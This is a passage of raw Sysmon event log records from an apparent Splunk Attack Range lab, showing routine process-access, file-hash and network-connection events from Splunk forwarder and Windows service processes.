Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF239f43.TMPMD5=89BBCBA41298FD5DA7B1190DCA9E555B,SHA256=7EEB5FE2CC8099DEACD32014B36D27B9EE4B62D83DF6BE24B4178C18B6811E68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108427Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:32.299{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EC0F0261BE3BF7BFA2620EB2916A4EC,SHA256=AA93DE09E88C54DDA560E2D7A6C7CA1E0B0DA239D1C5000C34A29D525FAE7810,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083922Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.895{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B590-615A-A601-00000000FD01}2536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083921Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.895{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083920Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.895{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083919Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.895{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083918Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.895{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083917Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.895{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083916Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.895{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083915Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.895{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083914Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.895{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083913Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.895{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083912Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.895{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B590-615A-A601-00000000FD01}2536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083911Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.895{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B590-615A-A601-00000000FD01}2536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083910Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.896{2FDD8D40-B590-615A-A601-00000000FD01}2536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083909Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.379{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CD2C77D7E389AC1CA5D927B271FB71F,SHA256=7778C0B9A9D44580206A5DA54153948A2821A6F9C437A803704B0D1945D06939,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083908Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.379{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E6AD4E80F89B5FAFB4CAA41B9DA6F650,SHA256=82FA5DF1F368BA52991EF892300DE16F132FA16D1AD4DFA0FAF2D3412184579A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108426Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:32.146{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=F15510EB7393E76BCB2DADF86A44449A,SHA256=6F0D82C0945AF154E92E9438313467DC100DBE7BF720238ED271BF6E7CFE7324,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108433Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:33.314{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DB46592CFA039556648DE29091C03EC,SHA256=B449BCFE15D3D1F1EF92522E2E3F79EBDD481990FD8E5CA2EE6E9BD47D2453A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083923Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:33.036{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1447A6D6449777B1C61D3D6B134A18F1,SHA256=B3ADBCB24F35784CA1E12D1A3DCDDE93487BAC35C4DC436AD32A594A9CC33341,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108435Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:32.346{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51966-false10.0.1.12-8000- 23542300x8000000000000000108434Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:34.329{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF6144EA477A636921B6AB540CF9C53E,SHA256=071BCE194C9D6C062143FC10F6EAE5E391B59A583A445D7EC9E7C18884B27D4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083940Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.552{2FDD8D40-B592-615A-A701-00000000FD01}39162136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000083939Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:32.579{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50202-false10.0.1.12-8000- 10341000x800000000000000083938Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.333{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B592-615A-A701-00000000FD01}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083937Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.333{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083936Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.333{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083935Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.333{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083934Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.333{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083933Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.333{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083932Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:34.333{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083931Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 